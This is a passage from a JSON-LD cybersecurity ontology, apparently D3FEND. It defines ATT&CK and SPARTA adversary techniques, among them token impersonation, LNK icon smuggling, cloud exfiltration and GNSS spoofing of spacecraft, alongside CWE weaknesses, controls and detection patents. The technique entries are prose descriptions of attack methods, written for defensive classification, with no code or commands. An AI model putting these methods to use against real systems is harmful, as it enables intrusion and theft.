      "d3f:definition": "x may-produce y: The entity x may produce the thing y; that is, 'x produces y' may be true.",
      "rdfs:label": "may-produce",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-520",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-520",
      "d3f:definition": "Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.",
      "rdfs:label": ".NET Misconfiguration: Use of Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-266"
      }
    },
    {
      "@id": "d3f:T1567.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567.002",
      "d3f:definition": "Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      },
      "rdfs:label": "Exfiltration to Cloud Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1567"
        },
        {
          "@id": "_:N6b9d58d65e394641aee5d7667ab6b4fb"
        }
      ]
    },
    {
      "@id": "_:N6b9d58d65e394641aee5d7667ab6b4fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-205",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-205",
      "d3f:definition": "The product's behaviors indicate important differences that may be observed by unauthorized actors in a way that reveals (1) its internal state or decision process, or (2) differences from other products with equivalent functionality.",
      "rdfs:label": "Observable Behavioral Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:RegressionAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RA",
      "d3f:definition": "Regression analysis is a set of statistical processes for estimating the relationships between a dependent variable (often called the 'outcome' or 'response' variable, or a 'label' in machine learning parlance) and one or more independent variables (often called 'predictors', 'covariates', 'explanatory variables' or 'features').",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Regression analysis. [Link](https://en.wikipedia.org/wiki/Regression_analysis)",
      "rdfs:label": "Regression Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:StatisticalMethod"
      }
    },
    {
      "@id": "d3f:LoginSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a login session is the period of activity between a user logging in and logging out of a (multi-user) system. This includes local login sessions, where a user has direct physical access to a computer, as well as domain login sessions, where a user logs into a computer that is part of a network domain.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Login_session"
      },
      "rdfs:label": "Login Session",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/windows-logon-scenarios"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Session"
      },
      "skos:altLabel": "Logon Session"
    },
    {
      "@id": "d3f:IA-0009.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.01",
      "d3f:definition": "Missions frequently depend on distributed teams, instrument builders at universities, science operations centers, and international partners, connected by data portals, shared repositories, and federated credentials. A compromise of a collaborator yields access to telescience networks, analysis pipelines, instrument commanding tools, and file exchanges that deliver ephemerides, calibration products, procedures, or configuration tables into mission workflows. Partners may operate their own ground elements or payload gateways under delegated authority, creating additional entry points whose authentication and logging differ from the prime’s. Initial access emerges when attacker-modified artifacts or commands traverse these sanctioned paths: a revised calibration script uploaded through a science portal, a configuration table promoted by a cross-org CI job, or a payload task submitted via a collaboration queue and forwarded by the prime as routine work. Variations in process rigor, identity proofing, and toolchains across institutions amplify the attacker’s options while preserving the appearance of legitimate partner activity.",
      "rdfs:label": "Mission Collaborator (academia, international, etc.) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "Mission Collaborator (academia, international, etc.)"
    },
    {
      "@id": "d3f:NetworkConnectionListenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network endpoint begins listening for new network connections.",
      "rdfs:label": "Network Connection Listen Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:may-execute",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-execute y: The subject x may take the action of carrying out (executing) y, which is a single software module, function, or instruction.",
      "rdfs:label": "may-execute",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Host-basedFirewall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software firewall which controls network inbound and outbound network traffic to the host computer.",
      "rdfs:label": "Host-based Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemSoftware"
      }
    },
    {
      "@id": "d3f:DE-0009",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009",
      "d3f:definition": "The adversary exploits the physical and operational environment to reduce detectability or to mislead observers. Tactics include signature management (minimizing RF/optical/thermal/RCS), controlled emissions timing, deliberate power-down/dormancy, geometry choices that hide within clutter or eclipse, and the deployment of decoys that generate convincing tracks. CCD can also leverage naturally noisy conditions, debris-rich regions, auroral radio noise, solar storms, to mask proximity operations or to provide plausible alternate explanations for anomalies. The unifying theme is environmental manipulation: shape what external sensors perceive so surveillance and attribution lag, misclassify, or look elsewhere.",
      "rdfs:label": "Camouflage, Concealment, and Decoys (CCD) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Camouflage, Concealment, and Decoys (CCD)"
    },
    {
      "@id": "d3f:T1027.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.012",
      "d3f:definition": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.",
      "rdfs:label": "LNK Icon Smuggling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:may-disable",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-disable",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-evict"
      }
    },
    {
      "@id": "d3f:T1134.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.003",
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "d3f:creates": {
        "@id": "d3f:LoginSession"
      },
      "d3f:definition": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.",
      "d3f:may-modify": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Make and Impersonate Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:Nb28aa3d110574a09895cbad4cf803c7d"
        },
        {
          "@id": "_:N0461c960a2fb49f6b5cfff9ca8381e5f"
        },
        {
          "@id": "_:N6aa09ef4e61749f5afb26116b23e31b6"
        }
      ]
    },
    {
      "@id": "_:Nb28aa3d110574a09895cbad4cf803c7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "_:N0461c960a2fb49f6b5cfff9ca8381e5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoginSession"
      }
    },
    {
      "@id": "_:N6aa09ef4e61749f5afb26116b23e31b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1414",
      "@type": "owl:Class",
      "d3f:attack-id": "T1414",
      "d3f:definition": "Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard)",
      "rdfs:label": "Clipboard Data - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Clipboard Data"
    },
    {
      "@id": "d3f:ChildProcess",
      "@type": "owl:Class",
      "d3f:definition": "A child process in computing is a process created by another process (the parent process). This technique pertains to multitasking operating systems, and is sometimes called a subprocess or traditionally a subtask. There are two major procedures for creating a child process: the fork system call (preferred in Unix-like systems and the POSIX standard) and the spawn (preferred in the modern (NT) kernel of Microsoft Windows, as well as in some historical operating systems).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Child_process"
      },
      "rdfs:label": "Child Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Parent_process"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:ATTACKMobileImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0034"
      },
      "rdfs:label": "Impact Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N7ccfa08190544be8a80716a6cb135003"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N7ccfa08190544be8a80716a6cb135003",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0034"
      }
    },
    {
      "@id": "d3f:AuthenticationLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of authentication events.",
      "d3f:records": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Authentication Log",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authorization"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLog"
        },
        {
          "@id": "_:N982daca6e5534558af063ead745d3699"
        }
      ]
    },
    {
      "@id": "_:N982daca6e5534558af063ead745d3699",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Dynamic Privilege Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(6)"
    },
    {
      "@id": "d3f:TA0032",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Discovery - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:EX-0014.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0014.04",
      "d3f:definition": "The adversary transmits GNSS-like signals (or manipulates crosslink-distributed time/ephemeris) so the spacecraft’s navigation solution reflects attacker-chosen states. With believable code phases, Doppler, and navigation messages, the victim can be pulled to a false position/velocity/time, causing downstream functions, attitude pointing limits, station visibility prediction, eclipse timing, antenna pointing, and anti-replay windows, to misbehave. Even when GNSS is not the primary navigation source, spoofed PNT can bias timekeeping or seed filters that fuse multiple sensors, leading to mis-scheduling and errant control. The defining feature is externally provided navigation/time that passes validity checks yet encodes a crafted trajectory or epoch.",
      "d3f:spoofs": {
        "@id": "d3f:GNSSSignal"
      },
      "rdfs:label": "Position, Navigation, and Timing (PNT) Spoofing - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0014"
        },
        {
          "@id": "_:N6e979034e0f74164a4cb02189b3efd0f"
        }
      ],
      "skos:prefLabel": "Position, Navigation, and Timing (PNT) Spoofing"
    },
    {
      "@id": "_:N6e979034e0f74164a4cb02189b3efd0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSSignal"
      }
    },
    {
      "@id": "d3f:CCI-002605_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs security-relevant software updates within an organization-defined time period of the release of the updates.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002605"
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingExternalControlOfCompromisedHosts_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9407647B2/en?oq=US-9407647-B2"
      },
      "d3f:kb-abstract": "A detection engine may be implemented by receiving network traffic and processing the traffic into one or more session datasets. Sessions not initiated by an internal host may be discarded. The frequency between the communication packets from the internal host to external host may be grouped or processed into rapid-exchange instances. The number of rapid-exchange instances, the time intervals between them, and/or the rhythm and directions of the initiation of the instances may be analyzed to determine that a human actor is manually controlling the external host. In some embodiments, when it is determined that only one human actor is involved, alarm data may be generated that indicates that a network intrusion involving manual remote control has occurred or is underway.",
      "d3f:kb-author": "Nicolas BEAUCHESNE; Ryan James PRENGER",
      "d3f:kb-mitre-analysis": "This patent describes detecting an external attacker taking remote control of an internal host. Detection includes identifying sessions where the external host controls the internal host in the opposite direction the session was initiated. The number of rapid-exchange communication instances (i.e, communications that occur between the two hosts with little silence gap), the time intervals between them, and/or the rhythm and direction of the instances, are analyzed to determine if an external human actor is manually controlling the internal host.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "Method and system for detecting external control of compromised hosts",
      "rdfs:label": "Reference - Method and system for detecting external control of compromised hosts - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:CWE-69",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-69",
      "d3f:definition": "The product does not properly prevent access to, or detect usage of, alternate data streams (ADS).",
      "rdfs:label": "Improper Handling of Windows ::DATA Alternate Data Stream",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:PhysicalLinkErrorDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "The device automatically disables the link in response to fault conditions such as excessive faults or signal degradation.",
      "rdfs:label": "Physical Link Error Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N90134d00a7d5494a90a67694be8d95df"
        }
      ]
    },
    {
      "@id": "_:N90134d00a7d5494a90a67694be8d95df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:T1518",
      "@type": "owl:Class",
      "d3f:attack-id": "T1518",
      "d3f:definition": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "Software Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:NTFSSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "An NTFS symbolic link records the path of another file that the links contents should show. Can accept relative paths. SMB networking (UNC path) and directory support added in NTFS 3.1.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTFSLink"
        },
        {
          "@id": "d3f:SymbolicLink"
        }
      ],
      "skos:altLabel": "NTFS Symlink"
    },
    {
      "@id": "d3f:T1203",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1203",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.",
      "d3f:modifies": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Client Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N87108f2bcdd44593ae66742e5a29fbf9"
        },
        {
          "@id": "_:N9951e1d4d2a0480a966482d5360fc3d1"
        }
      ]
    },
    {
      "@id": "_:N87108f2bcdd44593ae66742e5a29fbf9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N9951e1d4d2a0480a966482d5360fc3d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:T1569.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569.001",
      "d3f:definition": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)",
      "rdfs:label": "Launchctl",
      "rdfs:subClassOf": {
        "@id": "d3f:T1569"
      }
    },
    {
      "@id": "d3f:Vehicle",
      "@type": "owl:Class",
      "d3f:definition": "A vehicle is a machine designed for self-propulsion, usually to transport people, cargo, or both.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Vehicle"
      },
      "rdfs:label": "Vehicle",
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:Reference-MethodForDetectingAnomaliesInTimeSeriesDataProducedByDevicesOfAnInfrastructureInANetwork",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/CA3191230A1/"
      },
      "d3f:kb-abstract": "The present invention relates to a method for detecting anomalies in time series data produced by devices of an infrastructure in a network comprising, for each of the devices through computerized data processing means, retrieving a time series data for the device in the network, extracting a plurality of time series samples relating to respective time windows and having a predefined window size and a predefined stride, by sliding the time windows to overlap the time series data, supplying the time series samples as input to a Convolutional Autoencoder to define reconstructed time series values having a predefined percentile intervals, analysing the reconstructed time series values to identify anomalous behaviours of the time series data, signalling an anomaly of the device when at least one anomalous behaviour is identified.",
      "d3f:kb-organization": "Nozomi Networks",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteFirmwareUpdateMonitoring"
      },
      "d3f:kb-reference-title": "Method for detecting anomalies in time series data produced by devices of an infrastructure in a network",
      "rdfs:label": "Reference - Method for detecting anomalies in time series data produced by devices of an infrastructure in a network"
    },
    {
      "@id": "d3f:IA-0013",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0013",
      "d3f:definition": "The inverse of \"IA-0006: Compromise Hosted Payload\", this technique describes adversaries that are targeting a hosted payload, the host space vehicle (SV) can serve as an initial access vector to compromise the payload through vulnerabilities in the SV's onboard systems, communication interfaces, or software. If the SV's command and control systems are exploited, an attacker could gain unauthorized access to the vehicle's internal network. Once inside, the attacker may laterally move to the hosted payload, particularly if it shares data buses, processors, or communication links with the vehicle.",
      "rdfs:label": "Compromise Host Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0013/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Host Spacecraft"
    },
    {
      "@id": "d3f:CWE-773",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-773",
      "d3f:definition": "The product does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed.",
      "rdfs:label": "Missing Reference to Active File Descriptor or Handle",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-771"
      }
    },
    {
      "@id": "d3f:OTReadCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read or retrieve data.",
      "rdfs:comment": [
        "BACnet: confirmedCOVNotification\nBACnet: subscribeCOV\nBACnet: atomicReadFile\nBACnet: readProperty\nBACnet: readPropertyConditional\nBACnet: readPropertyMultiple\nBACnet: unconfirmedCOVNotification\nBACnet: readRange\nBACnet: subscribeCOVProperty\nBACnet: getEventInformation\nBACnet: subscribe-cov-property-multiple\nBACnet: confirmed-cov-notification-multiple\nBACnet: unconfirmed-cov-notification-multiple ",
        "CIP: Get Attributes All\nCIP: Get Attribute List\nCIP: Get Attribute Single\nCIP: Find Next Object Instance\nCIP: Get Member ",
        "GE-SRTP: READ SYSTEM MEMORY\nGE-SRTP: READ TASK MEMORY ",
        "Modbus: Read Coils\nModbus: Read Discrete Inputs\nModbus: Read Holding Registers\nModbus: Read Input Registers\nModbus: Read File Record\nModbus: Read FIFO Queue"
      ],
      "rdfs:label": "OT Read Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:CWE-185",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-185",
      "d3f:definition": "The product specifies a regular expression in a way that causes data to be improperly matched or compared.",
      "rdfs:label": "Incorrect Regular Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:ParametricTests",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PT",
      "d3f:definition": "A parametric test relies upon the assumption that the data you want to test is (or approximately is) normally distributed.",
      "d3f:kb-article": "## References\nNewcastle University. (n.d.). Parametric Hypothesis Tests. [Link](https://www.ncl.ac.uk/webtemplate/ask-assets/external/maths-resources/psychology/parametric-hypothesis-tests.html)",
      "rdfs:label": "Parametric Tests",
      "rdfs:subClassOf": {
        "@id": "d3f:HypothesisTesting"
      }
    },
    {
      "@id": "d3f:RegistryKeyDeletion",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RegistryKeyDeletion"
      ],
      "d3f:d3fend-id": "D3-RKD",
      "d3f:definition": "Delete a registry key.",
      "d3f:deletes": {
        "@id": "d3f:WindowsRegistryKey"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Registry Key Deletion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N2cb141a1bdc749228362324b30dfbd9d"
        }
      ]
    },
    {
      "@id": "_:N2cb141a1bdc749228362324b30dfbd9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:IA-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005",
      "d3f:definition": "Adversaries may execute a sequence of orbital maneuvers to co-orbit and approach a target closely enough for local sensing, signaling, or physical interaction. Proximity yields advantages that are difficult to achieve from Earth: high signal-to-noise for interception, narrowly targeted interference or spoofing, observation of attitude/thermal behavior, and, if interfaces exist, opportunities for mechanical mating. The approach typically unfolds through phasing, far-field rendezvous, relative navigation (e.g., vision, lidar, crosslink cues), and closed-loop final approach. At close distances, an attacker can monitor side channels, stimulate acquisition beacons, test crosslinks, or prepare for contact operations (capture or docking).",
      "rdfs:label": "Rendezvous & Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Rendezvous & Proximity Operations"
    },
    {
      "@id": "d3f:Email",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An email, or email message, is a document that is sent between computer users across computer networks.",
      "d3f:may-contain": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Email",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Email"
        },
        {
          "@id": "https://schema.ocsf.io/objects/email"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "_:N6b5214f12550426daf8aae0cdf1f3dea"
        },
        {
          "@id": "_:Nd423e759c0ea4e9b813c1e94a61ea0f2"
        }
      ]
    },
    {
      "@id": "_:N6b5214f12550426daf8aae0cdf1f3dea",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Nd423e759c0ea4e9b813c1e94a61ea0f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:Autoencoding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AUT",
      "d3f:definition": "Autoencoders are specific type of deep learning architecture used for learning representation of data, typically for the purpose of dimensionality reduction. This is achieved by designing deep learning architecture that aims that copying input layer at its output layer.",
      "d3f:kb-article": "## References\nSOCR. (n.d.). ABIDE Autoencoder. [Link](https://socr.umich.edu/HTML5/ABIDE_Autoencoder/#:~:text=In%20simple%20words%2C%20autoencoders%20are,layer%20at%20its%20output%20layer.)",
      "rdfs:label": "Autoencoding",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:Reference-RPCCallInterception_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150163109"
      },
      "d3f:kb-abstract": "A service proxy is described herein. The service proxy is configured to act as an intermediary between a client and a service. The service proxy may observe communications, modify communications, log communications, or the like, particularly so as to enhance the security and reliability of the host device. In some implementations, the service proxy may cooperate with an operating system to take over a named port object. In some implementations, the service proxy may receive messages as an intermediary between the client and the server. In some implementations, the service proxy may attach to a shared memory to intercept communications. In some implementations, the service proxy may be injected into a client process to appear to be the client itself.",
      "d3f:kb-author": "Ion-Alexandru Ionescu",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "RPC call interception",
      "rdfs:label": "Reference - RPC call interception - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-122",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-122",
      "d3f:definition": "A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().",
      "rdfs:label": "Heap-based Buffer Overflow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-787"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1191",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1191",
      "d3f:definition": "The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.",
      "rdfs:label": "On-Chip Debug and Test Interface With Improper Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1204.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.005",
